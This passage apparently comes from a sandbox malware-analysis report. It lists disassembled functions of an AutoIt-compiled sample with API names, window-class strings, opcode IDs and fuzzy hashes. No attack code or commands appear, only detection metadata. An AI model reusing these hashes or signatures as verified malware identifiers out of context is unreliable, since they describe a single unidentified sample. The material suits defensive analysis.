                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf
                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                    • API String ID: 3988819677-2584243854
                                                                                                                    • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                                                    • Instruction ID: fcb16cb575f5b93299da3697cd090d9eca1dfd4e0bfbe92529fb77ab23bd0554
                                                                                                                    • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                                                    • Instruction Fuzzy Hash: F6317AB6B08B4395EB24DB61E9551EC3361FB54B88F484032DA0EA7B59DF3DE80AC740
                                                                                                                    Function 00007FF65608B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateMessageObjectSendStock
                                                                                                                    • String ID: $SysTabControl32
                                                                                                                    • API String ID: 2080134422-3143400907
                                                                                                                    • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                                                    • Instruction ID: f4a34097338444ec3f52cef93797608ba581321a496e59db0666d2aa265a3057
                                                                                                                    • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                                                    • Instruction Fuzzy Hash: F73159325087C18BE760CF25E44475AB7A1F784BA4F184335EAA957AE8CF39D485CF00
                                                                                                                    Function 00007FF65601DC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileHandleType
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3000768030-2766056989
                                                                                                                    • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                                                    • Instruction ID: 2cca37332e7236b073b9a552a1282fe8debb18d51bca3ff51f881e3c2d455e9c
                                                                                                                    • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                                                    • Instruction Fuzzy Hash: D121F522A08E5381EB648B299AD01396651EB85778F2C0735D66FA33D4CE3ED88AC300
                                                                                                                    Function 00007FF65608A0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                    • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                                                    • Instruction ID: 62cf2a443b6bcf7c718460ea9fcf12332793383ab2fd831f1422eb03bcbd5d3a
                                                                                                                    • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                                                    • Instruction Fuzzy Hash: 50313C32A087818BD764CF29E54475AB7A5F788790F144239EB9953B98DF39E845CF00
                                                                                                                    Function 00007FF656089868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 1025951953-2096851135
                                                                                                                    • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                                    • Instruction ID: 8e27b5287152dbefacf64ecae9c6dd9f7b57ff3bb7e04f3ecacd23b809835a38
                                                                                                                    • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                                    • Instruction Fuzzy Hash: CC3147326097818AE770DF29A444B5AB7A1F784790F544234EAA853B99CF3DD845CF00
                                                                                                                    Function 00007FF656089BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                                    • Instruction ID: f5ae9fcf023a9f5a619080fccc0c3b27736fcd30584c895be83d99cb27fbc00a
                                                                                                                    • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                                    • Instruction Fuzzy Hash: 34316B36A08B81CAE770CB15E44475AB7A1FB84790F144235EAAC83B99CF3DD885CF00
                                                                                                                    Function 00007FF65601FD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: "$pow
                                                                                                                    • API String ID: 1757819995-713443511
                                                                                                                    • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                                    • Instruction ID: d6b16edbdd3967e5ff47f1eb6ca81f440fb37cb34c42060baeb40c5f9c05e769
                                                                                                                    • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                                    • Instruction Fuzzy Hash: C6217E72D1CA8587D370CF10E44066AAAE1FBDA348F241325F28A56A55DFBED189DB00
                                                                                                                    Function 00007FF65604DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                                    • Instruction ID: e59bd02c46258b8f338bc3cde73272dab45b2edae6a187aae33681ec9ddbee41
                                                                                                                    • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                                    • Instruction Fuzzy Hash: 2F11E462B0978181E620EB11D1440EE63A1FB95FA4F484231DAEDA77DADF3DD50ACB40
                                                                                                                    Function 00007FF65604DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                                    • Instruction ID: cc8ef594977815366c08ea94c007b9e65a0cfa303d81f063482d446339a3af28
                                                                                                                    • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                                    • Instruction Fuzzy Hash: AE11C422A0968691EF20D710E2551FE2751FF95B84F4C4130EACDA7B9ADF6DD60ACF00
                                                                                                                    Function 00007FF65604DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                                    • Instruction ID: 7412aaf69a453aae4658e3ae7aec5d7a8433d40205de33d54a4c672dae8eade4
                                                                                                                    • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                                    • Instruction Fuzzy Hash: 5011B622A0968291EB20DB10E1551EE6361FF99B84F884431EACD97B99DF6DD60ACF00
                                                                                                                    Function 00007FF65606E708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                    • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                                                    • Instruction ID: b221e32e167f491eac5533b09eef01a7a52829a900659b00a55cad6b3e9b9b58
                                                                                                                    • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                                                    • Instruction Fuzzy Hash: D5119436A1C74182E7618B55E2047BD63A1EB80B58FA84035DB8D966D9DF3ED8CACB00
                                                                                                                    Function 00007FF65608FEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3712363035-3916222277
                                                                                                                    • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                                    • Instruction ID: cb619ad96e19464b8b7d2eb01c1ca4b0f0752a575451f9cbbebfb6d89e81b659
                                                                                                                    • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                                    • Instruction Fuzzy Hash: 5C113031A1CB418AE714CF16FA1016AB7B5FB857C4F489235EA4D97A65CF3ED498CB00
                                                                                                                    Function 00007FF65604DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                                    • Instruction ID: d2b59db0d703cf24f571ee71fc47cfc480f67dbaad18d786585d8b81fde9cf2b
                                                                                                                    • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                                    • Instruction Fuzzy Hash: 4301C422A1D54291EA30E714E2941FD6361FF95788F884131EA8D97ADADF6DD60DCB00
                                                                                                                    Function 00007FF6560215B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$tan
                                                                                                                    • API String ID: 3384550415-2428968949
                                                                                                                    • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                                    • Instruction ID: bc845a33e1a203b3fe161d2b8c2883ba94a771e71c1abf2fa1f6b327f2a10a66
                                                                                                                    • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                                    • Instruction Fuzzy Hash: D3019671A28B8581DA14CF12E91033A6252BFDA7D4F144334EA5E1BB84EF7DD1548B00
                                                                                                                    Function 00007FF6560214E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$cos
                                                                                                                    • API String ID: 3384550415-1949035351
                                                                                                                    • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                                                    • Instruction ID: 911de90e899d131f80aa22650a4a5c0e7a9ccf3fc1c686093dfcf3201e33d03e
                                                                                                                    • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                                                    • Instruction Fuzzy Hash: 9D01FC71E18B8981D614CF22D81033A6252BFDA7D4F104334EA5E2ABC4EF7ED054CB00
                                                                                                                    Function 00007FF6560214FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$sin
                                                                                                                    • API String ID: 3384550415-1565623160
                                                                                                                    • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                                                    • Instruction ID: 3d044263911a1ddab3fe07bec1840f6a9f9b5cf16cfb7654a83e3141f6bb02a6
                                                                                                                    • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                                                    • Instruction Fuzzy Hash: B901D871E18B8581D614CF22D81033A6252BFDA7D4F104334EA5E2AB84EF7ED0448B00
                                                                                                                    Function 00007FF656021370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
